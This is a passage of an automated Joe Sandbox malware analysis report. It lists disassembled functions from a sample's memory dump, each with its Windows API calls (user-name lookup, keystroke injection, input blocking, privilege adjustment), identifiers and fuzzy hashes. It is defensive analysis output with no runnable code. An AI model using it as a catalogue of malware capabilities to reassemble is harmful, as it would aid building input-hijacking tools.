                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                  • String ID:
                                  • API String ID: 3429775523-0
                                  • Opcode ID: c298424f7ccc0e1f888b1d457ff0235942794a7a50ef5aad3aa43b2e6662b193
                                  • Instruction ID: e1c9bacdeb5b1a08a6152e5767e67b82594192a4108339f254bc10ca6bebff69
                                  • Opcode Fuzzy Hash: c298424f7ccc0e1f888b1d457ff0235942794a7a50ef5aad3aa43b2e6662b193
                                  • Instruction Fuzzy Hash: 9DF0F47195030DFBDF11DFE49C89AAEBBBCEB08704F504565E901E6181E774EA448A50
                                  Function 00374CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(003828E9,?,00374CBE,003828E9,004188B8,0000000C,00374E15,003828E9,00000002,00000000,?,003828E9), ref: 00374D09
                                  • TerminateProcess.KERNEL32(00000000,?,00374CBE,003828E9,004188B8,0000000C,00374E15,003828E9,00000002,00000000,?,003828E9), ref: 00374D10
                                  • ExitProcess.KERNEL32 ref: 00374D22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: a54c2d5caabd2dbb74f4cab525e197e43018dc8fe693a9ac1a0d9e564f443fb3
                                  • Instruction ID: 22d6191a908c559c21e7251f03a07017be9ed375c97a503568c75b60714da2de
                                  • Opcode Fuzzy Hash: a54c2d5caabd2dbb74f4cab525e197e43018dc8fe693a9ac1a0d9e564f443fb3
                                  • Instruction Fuzzy Hash: 5AE0B631010288AFCF33AF54DD59A583B6DEB41781F118114FC599E263DB39ED52CB80
                                  Function 003AD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 003AD28C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID: X64
                                  • API String ID: 2645101109-893830106
                                  • Opcode ID: aa8e449139c4ed3d6444593437a1fccca559f55293dd866ba061aaf2b707862b
                                  • Instruction ID: d7e3bfa0d62b24b1c0da0ef2bbb838c6d5cabee25540101f7ae60eca6b4fc897
                                  • Opcode Fuzzy Hash: aa8e449139c4ed3d6444593437a1fccca559f55293dd866ba061aaf2b707862b
                                  • Instruction Fuzzy Hash: 82D0C9B481111DEACB91DB90DCC8DDDB37CBB04305F104651F506A2440D73095498F10
                                  Function 0037CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                  • Instruction ID: d975b6b74a8bc32666459584bdca3b64a074df6cc7349a0f91772d9b6010ca6a
                                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                  • Instruction Fuzzy Hash: 02021B71E102199BDF25CFA9C8806ADFBF1EF48314F25816ED919EB384D734AE418B84
                                  Function 0035CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Variable is not of type 'Object'.$p#B
                                  • API String ID: 0-3372324753
                                  • Opcode ID: 3f1a5dbe12a15c08441150f8203ec799fedc8dbd081c123877bdb619f2189cdf
                                  • Instruction ID: c1110a5762e245c3120ce97e5f02c4962a0af7dfcc71f206b57302ba626567f0
                                  • Opcode Fuzzy Hash: 3f1a5dbe12a15c08441150f8203ec799fedc8dbd081c123877bdb619f2189cdf
                                  • Instruction Fuzzy Hash: 40327A709102189FCF1ADF90C981EEDB7B9FF05309F119059EC06AB2A2D775AD4ACB50
                                  Function 003C68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 003C6918
                                  • FindClose.KERNEL32(00000000), ref: 003C6961
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: 5caf4315a6f95620154c8ecdfe9d916571c209088c242a479a7ae8cb24c58520
                                  • Instruction ID: bba71517a85bb0772b565d9ecb624938fd048195c1990f80efa3d866ffaab128
                                  • Opcode Fuzzy Hash: 5caf4315a6f95620154c8ecdfe9d916571c209088c242a479a7ae8cb24c58520
                                  • Instruction Fuzzy Hash: 4F11BE316142009FC711DF29D885F1ABBE4EF89329F05C69DE8698F2A2C730EC05CB90
                                  Function 003C37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003D4891,?,?,00000035,?), ref: 003C37E4
                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003D4891,?,?,00000035,?), ref: 003C37F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: 2fd2fe0e7fb0fbf3799b85dcce3e3b302d050b129abb432530f3f243b4799cdc
                                  • Instruction ID: 51f690cffe226bdece4d3505f178bfa34c5a45e580a9800fee370db4db963a0d
                                  • Opcode Fuzzy Hash: 2fd2fe0e7fb0fbf3799b85dcce3e3b302d050b129abb432530f3f243b4799cdc
                                  • Instruction Fuzzy Hash: 57F0E5B16053296AEB2217668C8DFEB3AAEEFC5761F000265F509E62D1D9609D04C7B0
                                  Function 003BB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003BB25D
                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 003BB270
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: InputSendkeybd_event
                                  • String ID:
                                  • API String ID: 3536248340-0
                                  • Opcode ID: c21ffb96f560a597a5e78285df8ac4bfa1db266440c5a4c1a4c4fc807628a446
                                  • Instruction ID: 940e2beef61ab88f0c8ff236fa98bf32638e15de98f2661b2e07591436bfb7f5
                                  • Opcode Fuzzy Hash: c21ffb96f560a597a5e78285df8ac4bfa1db266440c5a4c1a4c4fc807628a446
                                  • Instruction Fuzzy Hash: 2CF01D7181428DABDF169FA1C805BEEBBB4FF04309F009409F965A9192C779C6119F94
                                  Function 003B10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B11FC), ref: 003B10D4
                                  • CloseHandle.KERNEL32(?,?,003B11FC), ref: 003B10E9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AdjustCloseHandlePrivilegesToken
                                  • String ID:
                                  • API String ID: 81990902-0
                                  • Opcode ID: d5432a7536dd9e4b82f692df3b83007904a4bc10341482ab913704d41f9b134f
                                  • Instruction ID: e47eedddb33711323498fa068a6b25f66f071d43cb12d6492da4ee2fd3b02133
                                  • Opcode Fuzzy Hash: d5432a7536dd9e4b82f692df3b83007904a4bc10341482ab913704d41f9b134f
                                  • Instruction Fuzzy Hash: 00E04F32014640AEE7362B11FC05E777BADFB04310F10C92EF5A5844B5DB62AC90DB10
                                  Function 0038676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00386766,?,?,00000008,?,?,0038FEFE,00000000), ref: 00386998
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: 820cf529af193722ba710630aab176a98923967541e540439a2b4bbe933c863a
                                  • Instruction ID: b1b585da8809ebfbcf1913f26ffbe8b7937cdc417b34e7479931b47bc76dc155
                                  • Opcode Fuzzy Hash: 820cf529af193722ba710630aab176a98923967541e540439a2b4bbe933c863a
                                  • Instruction Fuzzy Hash: 16B13C71510708DFD71ADF28C48AB657BE0FF45364F268698E899CF2A2C735E991CB40
                                  Function 0036B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: ab424eafa141bb4e232a2b5368798c680fc70f08cd84851b12fecf93dc954980
                                  • Instruction ID: 97131623c069c52c7c0426c7e3a67f573c520907d0681bbdec6bb52785b8bfa2
                                  • Opcode Fuzzy Hash: ab424eafa141bb4e232a2b5368798c680fc70f08cd84851b12fecf93dc954980
                                  • Instruction Fuzzy Hash: F9125075D002299BCB16CF59C8806EEB7F5FF49710F1581AAE849EB255EB309E81CF90
                                  Function 003CEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • BlockInput.USER32(00000001), ref: 003CEABD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: BlockInput
                                  • String ID:
                                  • API String ID: 3456056419-0
                                  • Opcode ID: 68bf8df6cc2677c3ff768332c009406afa7d1b6875288614b48d98b3815bafc1
                                  • Instruction ID: d2817e6c87a941d115c88ab75f7ce6a4b1a8b8dbc5ad2c0de307c8f789bdd1d0
                                  • Opcode Fuzzy Hash: 68bf8df6cc2677c3ff768332c009406afa7d1b6875288614b48d98b3815bafc1
                                  • Instruction Fuzzy Hash: F1E04F352202049FC711EF69D844E9AF7EDAF98760F00841AFC49CB3A1DB70EC458B90
                                  Function 003709D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003703EE), ref: 003709DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: e4edf4ffd6a3e9415b724974c0a3ae407c72565a18af86c7357fe4f81613e1d3
                                  • Instruction ID: e68a83cbf79b41b42c344e9652d0b102ed39caf934fb6477a12ff74e4d6fd9f5
                                  • Opcode Fuzzy Hash: e4edf4ffd6a3e9415b724974c0a3ae407c72565a18af86c7357fe4f81613e1d3
                                  • Instruction Fuzzy Hash:
                                  Function 0037781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                  • Instruction ID: eec3a590fdbc34a3c1c871a5c21de9f1167d1d4a4c1658462b344e8598c47d78
                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                  • Instruction Fuzzy Hash: 5951446160C709BADB3B8668C85F7BE23999B03340F19C919D98EDB682C71DDE01D393
                                  Function 003C2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0&B
                                  • API String ID: 0-2150014746
                                  • Opcode ID: 9801957611c97c57ff2f568ea61b2fec60fd20412685f51700f3a7c20c39bc4d
                                  • Instruction ID: c751e36cf29f8d00b416022f7b67740e930d082f5b08e359afeef1e9043d2166
                                  • Opcode Fuzzy Hash: 9801957611c97c57ff2f568ea61b2fec60fd20412685f51700f3a7c20c39bc4d
                                  • Instruction Fuzzy Hash: 4A2105327206108BD728CE79C92267E73E5B754310F15862EE4A7C73C0DE79AD04CB84
                                  Function 00386DD9 Relevance: .6, Instructions: 637COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
